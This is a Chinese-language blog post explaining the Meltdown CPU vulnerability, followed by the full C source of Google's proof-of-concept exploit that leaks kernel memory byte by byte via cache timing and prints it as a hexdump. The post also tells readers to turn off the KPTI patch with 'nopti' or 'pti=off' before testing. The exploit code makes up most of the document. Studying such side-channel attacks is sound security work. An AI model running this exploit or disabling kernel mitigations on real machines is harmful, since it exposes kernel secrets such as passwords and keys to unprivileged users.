X86 CPU 漏洞 Meltdown 原理及google攻击代码

南宫正阳

2023-12-01

Meltdown 的原理其实很简单。访问一个虚拟地址需要经过页表遍历（page table walk），现在一般都是 4 级页表，页表项的属性中有一位（U/S 位）用来区分该页是内核页还是用户页。程序运行在用户态时不允许访问内核地址，正是因为 CPU 在做虚拟地址到物理地址的转换时会检查这一位：用户态只能访问标记为用户页的页，内核页只有在内核态才能访问。Meltdown 的窗口期来自乱序执行：当用户态非法访问一个内核地址时，权限检查产生的异常要到指令退休时才真正生效，而在此之前，读到的数据已经被转发给后续指令投机执行；后续指令以该数据为下标去访问数组，就会在 cache 中留下痕迹，之后再通过测量访问延迟，就能从 cache 的状态里把数据还原出来。

原理两条汇编指令就可以解释的非常清楚：

mov al, byte ptr [r15]	 ; r15 保存一个内核的地址
shl rax, 6

第一条指令 mov al, [kernel address] 访问内核地址时要做地址转换（TLB 未命中时会走 page table walk），并检查页属性中的权限位；由于当前处于用户态，权限检查不通过，最终会触发 page fault。

第二条指令 shl rax, 6 在没有 meltdown 的情况下是不应该拿到第一条指令的结果的，因为第一条指令的页表权限检查不会通过。但是由于乱序执行，在权限检查完成、page fault 真正生效之前，第二条指令（以及其后以 rax 为下标的访存指令）已经用读到的内核数据投机执行了，结果是与内核数据对应的那条 cache line 被读入 cache，内核数据由此泄露。这个窗口期在 Intel Core 架构的 CPU 上都存在，但是 AMD 的 CPU 就没有这样的窗口期。Intel 这样设计就是奔着性能去的，代价是安全性降低了。反观 AMD，既要性能又要安全，确实良心。

Google 发布的攻击代码如下，感兴趣的同学可以去测试。现在的 Linux 内核都已经打了补丁（KPTI），在测试之前，请先在 grub 的内核启动参数里关掉 meltdown 补丁（例如加上 nopti 或 pti=off）。

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <err.h>
#include <stdbool.h>
#include <ctype.h>

/*
 * Inline-assembly helpers (GCC extended asm, x86-64).
 *
 * pipeline_flush(): loads 0 into EAX and executes CPUID, which is used
 * here to serialize the instruction stream around flushes and timed loads.
 * memory clobber is not actually true, but serves as a compiler barrier
 */
#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
/* clflush(addr): executes CLFLUSH on the address held in `addr`. */
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
/* read_byte(addr): loads from `addr` into r11 and discards the value.
 * NOTE(review): despite the name, the destination is the 64-bit register
 * r11, so this looks like an 8-byte load rather than a 1-byte load - confirm.
 */
#define read_byte(addr) asm volatile("mov (%0), %%r11"::"r"(addr):"r11","memory")
/* rdtscp(): executes RDTSCP and evaluates to the value left in EAX as an
 * unsigned int; EDX and ECX are only declared as clobbered, so just the
 * low 32 bits of the counter are returned.
 */
#define rdtscp() ({unsigned int result; asm volatile("rdtscp":"=a"(result)::"rdx","rcx","memory"); result;})

/*
 * Time a single load from `ptr`.
 *
 * Takes a timestamp with rdtscp(), performs the load via read_byte(), then
 * takes a second timestamp. pipeline_flush() is issued before the first
 * timestamp, between the first timestamp and the load, and after the second
 * timestamp.
 *
 * Returns the difference of the two 32-bit timestamps (t2 - t1, computed in
 * unsigned arithmetic and then converted to int). leak_bit() compares two
 * such values to decide which probe address was served faster.
 */
int timed_load(void *ptr) {
  pipeline_flush();
  unsigned int t1 = rdtscp();
  pipeline_flush();
  read_byte(ptr);
  unsigned int t2 = rdtscp();
  pipeline_flush();
  return t2 - t1;
}

/* leak_func_condition is in an otherwise unused page to prevent interference.
 *
 * The backing array holds 0x3000 unsigned longs; the macro below points at
 * element 0x1800, i.e. the middle of the array, so the word that is actually
 * used is surrounded by unused padding on both sides.
 * leak_bit() writes this word and then flushes it from the cache before
 * calling leak_func(), which reads it as its branch condition.
 */
unsigned long leak_func_condition_[0x3000];
#define leak_func_condition (leak_func_condition_ + 0x1800)

/* Most code isn't optimized to make the compiler's output more predictable,
 * but this function should probably be optimized.
 *
 * Gadget used by leak_bit(): if *leak_func_condition is zero, read one byte
 * from `source_ptr`, mask it with `bitmask`, shift it left by `bitshift` and
 * use the result as an index into `timing_leak_array`.
 *
 * Parameters:
 *   timing_leak_array - probe array indexed by the masked and shifted byte
 *   source_ptr        - address of the byte to read (dummy_array during
 *                       training, the target address on the real attempt)
 *   bitmask           - mask applied to the byte read from source_ptr
 *   bitshift          - left shift applied after masking
 *
 * Returns the probe-array byte that was read, or 0 when the condition word
 * is non-zero. leak_bit() ignores the return value; the call matters for
 * which probe-array location gets touched.
 */
__attribute__((noclone,noinline,optimize(3))) unsigned char leak_func(uint8_t *timing_leak_array, uint8_t *source_ptr, unsigned int bitmask, unsigned int bitshift) {
  pipeline_flush();
  /* run the branch if the high-latency load returns zero.
   * if the logic was the other way around, Intel's heuristic
   * where high-latency loads speculatively return zero (?)
   * would probably bite.
   */
  if (__builtin_expect(*leak_func_condition == 0, 1)) {
    return timing_leak_array[((*source_ptr)&bitmask)<<bitshift];
  }
  return 0;
}

/* "leak" from here when conditioning the branch predictor.
 * leak_bit() passes this one-byte array as the source pointer on the
 * training iterations.
 */
uint8_t dummy_array[1];

/* timing_leak_array is in an otherwise unused page to prevent interference.
 * The macro points 4096 bytes into the 10000-byte backing buffer; leak_bit()
 * probes offsets 0 and 1<<10 from that point.
 */
uint8_t timing_leak_array_[10000];
#define timing_leak_array (timing_leak_array_ + 4096)

/* File descriptor opened in main() on /proc/sys/kernel/core_pattern;
 * leak_bit() issues a one-byte pread() on it before every iteration.
 */
int freshen_fd;

/* Leak `*(uint8_t*)byte_addr & (1<<bit_idx)` from the kernel.
 * This function makes 16 attempts to leak the data.
 * Before each attempt, data is leaked from the `dummy_array`
 * in userspace 31 times, then discarded, to convince the
 * CPU to go down the wrong path when we try to leak from the
 * kernel.
 *
 * Parameters:
 *   byte_addr - address of the byte to leak
 *   bit_idx   - index (0..7) of the bit within that byte
 *
 * Returns 1 if more attempts found the "bit is 1" probe location faster
 * than the "bit is 0" one, otherwise 0 (ties count as 0).
 */
int leak_bit(unsigned long byte_addr, int bit_idx) {
  /* Slots 0..30 are training sources; slot 31 is the real target. */
  uint8_t *secret_arrays[32];
  for (int i=0; i<31; i++) {
    secret_arrays[i] = dummy_array;
  } 
  secret_arrays[31] = (void*)byte_addr;

  unsigned int votes_0 = 0;
  unsigned int votes_1 = 0;
  /* 16 rounds of 32 iterations; the last iteration of each round
   * (mislead == 31) is the actual leak attempt.
   */
  for (int i=0; i<16*32; i++) {
    //int attempt = (i >> 5) & 0xf;
    int mislead = i & 0x1f;
    uint8_t *cur_secret_array = secret_arrays[mislead];
    char discard;
    /* Read from core_pattern so the kernel touches the data first
     * (see the comment in main()); the result is deliberately ignored.
     */
    pread(freshen_fd, &discard, 1, 0);
    //
    //printf("discard is %c \n", discard);
    //
    pipeline_flush();
    /* Evict both probe locations: offset 0 stands for "bit is 0",
     * offset 1<<10 stands for "bit is 1".
     */
    clflush(timing_leak_array);
    clflush(timing_leak_array + (1<<10));
    /* Condition is 0 while training (branch in leak_func is taken) and 1 on
     * the real attempt (branch is architecturally not taken).
     */
    *leak_func_condition = (mislead == 31);
    pipeline_flush();
    /* Flush the condition word so leak_func's load of it is slow. */
    clflush(leak_func_condition);
    pipeline_flush();
    /* With mask 1<<bit_idx and shift 10-bit_idx the probe index is either
     * 0 or 1<<10, depending on the selected bit.
     */
    leak_func(timing_leak_array, cur_secret_array, 1<<bit_idx, 10-bit_idx);
    uint32_t latency_at_b0 = timed_load(timing_leak_array);
    uint32_t latency_at_b1 = timed_load(timing_leak_array + (1<<10));
    /* Only the real attempt votes; training iterations are discarded. */
    if (mislead == 31) {
      //printf("(%d,%d)\t", latency_at_b0, latency_at_b1);
      votes_0 += (latency_at_b0 < latency_at_b1);
      votes_1 += (latency_at_b1 < latency_at_b0);
    }
  }
  //printf("\nvotes_0: %d\nvotes_1: %d\n", votes_0, votes_1);
  return votes_0 < votes_1;
}

/*
 * Leak one byte at `byte_addr` by leaking each of its eight bits with
 * leak_bit(), least significant bit first, and assembling the results.
 *
 * Returns the reconstructed byte.
 */
uint8_t leak_byte(unsigned long byte_addr) {
  uint8_t assembled = 0;
  int pos = 0;
  while (pos < 8) {
    int bit = leak_bit(byte_addr, pos);
    assembled |= bit << pos;
    pos++;
  }
  return assembled;
}

/*
 * Leak `byte_count` bytes starting at address `byte_addr_start` via
 * leak_byte() and print them as a hexdump, 16 bytes per line: the address,
 * the bytes in hex, then an ASCII column in which bytes that are not
 * alphanumeric, punctuation or a space are shown as '.'.
 *
 * Lines consisting only of zero bytes are not printed; each run of such
 * lines is collapsed into a single "[ zeroes ]" marker.
 *
 * `byte_count` must be a multiple of 16, otherwise the process exits via
 * errx().
 */
void hexdump_memory(unsigned long byte_addr_start, unsigned long byte_count) {
  if (byte_count % 16)
    errx(1, "hexdump_memory called with non-full line");
  bool last_was_all_zeroes = false;
  /* Iterate over offsets instead of comparing against
   * byte_addr_start + byte_count: for a range that ends at the very top of
   * the address space that sum wraps around and the loop would never run.
   * byte_count is a multiple of 16, so `offset` reaches it exactly and
   * cannot overflow.
   */
  for (unsigned long offset = 0; offset < byte_count; offset += 16) {
    unsigned long byte_addr = byte_addr_start + offset;
    int bytes[16];
    bool all_zeroes = true;
    for (int i=0; i<16; i++) {
      bytes[i] = leak_byte(byte_addr + i);
      if (bytes[i] != 0)
        all_zeroes = false;
    }

    if (all_zeroes) {
      if (!last_was_all_zeroes) {
        puts("[ zeroes ]");
      }
      last_was_all_zeroes = true;
      continue;
    }
    last_was_all_zeroes = false;

    /* One output line needs well under 100 characters, so the sprintf
     * calls below stay far inside this buffer.
     */
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%016lx  ", byte_addr);
    for (int i=0; i<16; i++) {
      linep += sprintf(linep, "%02hhx ", (unsigned char)bytes[i]);
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<16; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    /* The final sprintf also writes the terminating NUL for puts(). */
    linep += sprintf(linep, "|");
    puts(line);
  }
}

/*
 * Entry point: `<prog> <kernel_addr> <length>`.
 *
 * kernel_addr is parsed as hexadecimal, length with automatic base
 * detection (decimal, 0x-prefixed hex, or 0-prefixed octal). Both must be
 * complete, well-formed numbers; otherwise the program exits with an error
 * instead of silently dumping from address 0 or dumping nothing.
 * hexdump_memory() additionally requires length to be a multiple of 16.
 */
int main(int argc, char **argv) {
  if (argc != 3)
    errx(1, "invocation: %s <kernel_addr> <length>", argv[0]);

  char *end;
  unsigned long start_addr = strtoul(argv[1], &end, 16);
  /* Reject empty input and trailing garbage. */
  if (end == argv[1] || *end != '\0')
    errx(1, "invalid kernel address: %s", argv[1]);
  unsigned long leak_len = strtoul(argv[2], &end, 0);
  if (end == argv[2] || *end != '\0')
    errx(1, "invalid length: %s", argv[2]);

  /* we will read from this fd before every attempt to leak data
   * to make the kernel load the core_pattern (and a couple other
   * data structures) into the CPU's data cache
   */
  freshen_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  if (freshen_fd == -1)
    err(1, "open corepat");

  hexdump_memory(start_addr, leak_len);

  close(freshen_fd);
  return 0;
}

github ：https://github.com/Tinycl/google_poc

X86 CPU 漏洞 Meltdown 原理及google攻击代码

相关阅读

相关文章

相关问答

相关文档